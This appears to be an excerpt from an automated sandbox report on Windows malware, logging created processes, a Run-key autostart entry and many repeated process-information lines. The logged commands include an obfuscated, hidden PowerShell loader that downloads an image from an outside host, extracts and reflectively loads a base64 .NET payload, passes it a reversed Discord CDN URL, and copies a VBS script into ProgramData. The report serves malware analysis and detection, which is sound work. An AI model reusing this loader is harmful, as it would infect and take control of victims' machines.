DgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&68912521d95e50412d355d520cfde21ed0d1e15609fe2233fcb0652f4755ccfa=mh&ce1d0566=si&c6322566=xe?txt.mak/8138417472850263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&68912521d95e50412d355d520cfde21ed0d1e15609fe2233fcb0652f4755ccfa=mh&ce1d0566=si&c6322566=xe?txt.mak/8138417472850263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD344809CD push E85DF55Dh; ret 3_2_00007FFD344809F9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD3446111F pushfd ; ret 7_2_00007FFD34461122

        Boot Survival

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\cognitivo.vbsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
